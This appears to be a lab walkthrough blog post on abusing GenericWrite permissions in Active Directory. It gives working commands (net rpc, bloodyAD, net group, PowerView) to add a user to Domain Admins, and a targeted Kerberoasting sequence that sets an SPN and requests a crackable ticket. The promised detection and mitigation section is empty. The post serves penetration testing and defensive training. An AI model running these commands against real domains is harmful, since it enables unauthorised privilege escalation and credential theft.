In this post, we explore GenericWrite Active Directory abuse, focusing on how attackers exploit Discretionary Access Control Lists (DACLs) to escalate privileges. By abusing the GenericWrite permission, adversaries can modify group memberships, service principal names, or login scripts—leading to lateral movement or domain dominance.

The lab setup necessary to simulate these attacks is outlined, with methods mapped to the MITRE ATT&CK framework to clarify the associated techniques and tactics. Detection mechanisms for identifying suspicious activities linked to GenericWrite attacks are also covered, alongside actionable recommendations for mitigating these vulnerabilities. This overview equips security professionals with critical insights to recognize and defend against these prevalent threats.

Table of Contents

GenericWrite Permission

Prerequisites

Lab Setup – User Owns GenericWrite Permission on the Domain Admin Group

Exploitation Phase I – User Owns GenericWrite Permission on a Group

Bloodhound – Hunting for Weak Permission

Method for Exploitation – Account Manipulation (T1098)

• Linux Net RPC – Samba
• Linux Bloody AD
• Windows Net command
• Windows PowerShell – Powerview

Lab Setup – User Owns GenericWrite Permission on Another User

Exploitation Phase II – User Owns GenericWrite Permission on Another User

Bloodhound – Hunting for Weak Permission

Method for Exploitation – Kerberoasting (T1558.003)

• Linux Python Script – TargetedKerberoast
• Windows PowerShell – Powerview

Detection & Mitigation

GenericWrite Permission

The GenericWrite permission in Active Directory allows a user to modify all writable attributes of an object, except for properties that require special permissions such as resetting passwords.

If an attacker gains GenericWrite over a user, they can write to the servicePrincipalNames attribute and immediately initiate a targeted Kerberoasting attack.
Moreover, having GenericWrite over a group enables them to add their account—or one they control—directly to that group, effectively escalating privileges.
Alternatively, if the attacker obtains GenericWrite over a computer object, they can modify the msds-KeyCredentialLink attribute. As a result, they create Shadow Credentials and authenticate as that computer account using Kerberos PKINIT.

Prerequisites

• Windows Server 2019 as Active Directory
• Kali Linux
• Tools: Bloodhound, Net RPC, Powerview, BloodyAD
• Windows 10/11 – As Client

Lab Setup – User Owns GenericWrite Permission on the Domain Admin Group

Create the Active Directory Environment:

To simulate an Active Directory environment, set up a Windows Server as a Domain Controller (DC) and a client machine (Windows or Linux) to run enumeration and exploitation tools.

Domain Controller:

• First, install Windows Server (2016 or 2019 recommended).
• Then, promote it to a Domain Controller by adding the Active Directory Domain Services role.
• Finally, set up the domain (e.g., ignite.local).

User Accounts:

• Next, create a standard user account named Anuradha:

net user anuradha Password@1 /add /domain

Assign the “GenericWrite” Privilege to Anuradha:

Once you configure the AD environment, assign the GenericWrite privilege to Anuradha for the Domain Admins group.

Steps:

• Open Active Directory Users and Computers (ADUC) on the Domain Controller.
• Enable the Advanced Features view by clicking on View > Advanced Features.
• Locate the Domain Admins group in the Users container.
• Right-click on Domain Admins and go to Properties.

• Navigate to the Security tab, then click on Add.

• In the “Enter the object name to select” box, type Anuradha and click Check Names, and then click on OK.

• In the Permissions section, check the box for Write permission.

• Selecting the Write checkbox automatically enables Add/remove self as member.

After applying the settings, Anuradha now has GenericWrite and AddSelf rights over the Domain Admins group. Consequently, she can add herself—or any principal she controls—to the group.

Exploitation Phase I – User Owns GenericWrite Permission on a Group

Bloodhound – Hunting for Weak Permission

Use BloodHound to Confirm Privileges: You can use BloodHound to verify that Anuradha has the GenericWrite permission on the Domain Admins group.

bloodhound-python -u anuradha -p Password@1 -ns 192.168.1.7 -d ignite.local -c All

From the graphical representation of Bloodhound, the tester would like to identify the outbound object control for selected user where the first degree of object control value is equal to 1.

Thus, it has shown the Anuradha User has GenericWrite and SelfAdd privilege to Domain Admin group.

Method for Exploitation – Account Manipulation (T1098)

Linux Net RPC – Samba

The tester can abuse this permission by adding Anuradha User into Domain Admin group and list the domain admin members to ensure that Anuradha Users becomes Domain Admin.

net rpc group addmem "Domain Admins" anuradha -U ignite.local/anuradha%'Password@1' -S 192.168.1.7

Bloody AD

Alternatively, it can be achieved using bloodyAD

bloodyAD --host "192.168.1.7" -d "ignite.local" -u "anuradha" -p "Password@1" add groupMember "Domain Admins" "anuradha"

Windows Net command

This can be achieved with a native command line, using windows net command.

net group "domain admins" anuradha /add /domain

thus, from user property we can see Anuradha user has become the member of domain admin.

Windows PowerShell – Powerview

The attacker can add a user/group/computer to a group. This can be achieved with with the Active Directory PowerShell module, or with Add-DomainGroupMember (PowerView module).

powershell -ep bypass
Import-Module .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'Password@1' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('ignite.local\anuradha', $SecPassword)
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'anuradha' -Credential $Cred

Lab Setup – User Owns GenericWrite Permission on Another User

Here, in this lab setup, we will create two users’ Krishna and Radha, where the user Radha has GenericWrite permission over the Krishna user.

Create the AD Environment and User accounts

• Create two AD user accounts named Krishna and Radha.

net user krishna Password@1 /add /domain
net user radha Password@1 /add /domain

Assign the “GenericWrite” Privilege:

• Open Active Directory Users and Computers (ADUC) on the Domain Controller.
• Enable the Advanced Features view by clicking on View > Advanced Features.
• Locate User Krishna in the Users
• Right-click on Krishna User and go to Properties.

• Go to the Securitytab, and click on Add button
• In the “Enter the object name to select” box, type Radhaand click Check Names and click on OK.
• Select Radha user and in the Permissionssection, check the box for Write
• Apply the settings.

At this point, Radha now has GenericWrite permission for Krishna user.

Exploitation Phase II – User Owns GenericWrite Permission on Another User

Bloodhound – Hunting for Weak Permission

Hunting for First-Degree Object Control for the Radha user, as demonstrated in the previous steps.

bloodhound-python -u anuradha -p Password@1 -ns 192.168.1.7 -d ignite.local -c All

From the graph it can be observed that the Radha user owns GenericWrite privilege on Krishna user.

Method for Exploitation – Kerberoasting (T1558.003)

This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, WriteProperty or Validated-SPN over the target.

Linux Python Script – TargetedKerberoast

From UNIX-like systems, this can be done with targetedKerberoast.py (Python).

Further, with the help of John the Ripper end the dictionary such as Rock You can help the attacker to brute force the weak password.

./targetedKerberoast.py --dc-ip '192.168.1.7' -v -d 'ignite.local' -u 'radha' -p 'Password@1'

Windows PowerShell – Powerview

From Windows machines, this can be achieved with Set-DomainObject and Get-DomainSPNTicket (PowerView module).

powershell -ep bypass
Import-Module .\PowerView.ps1
Set-DomainObject -Identity 'krishna' -Set @{serviceprincipalname='nonexistent/hacking'}
Get-DomainUser 'krishna' | Select serviceprincipalname
$User = Get-DomainUser 'krishna'
$User | Get-DomainSPNTicket

Detection & Mitigation

Author: Pradnya Pawar is an InfoSec researcher and Security Tech Lead. Contact here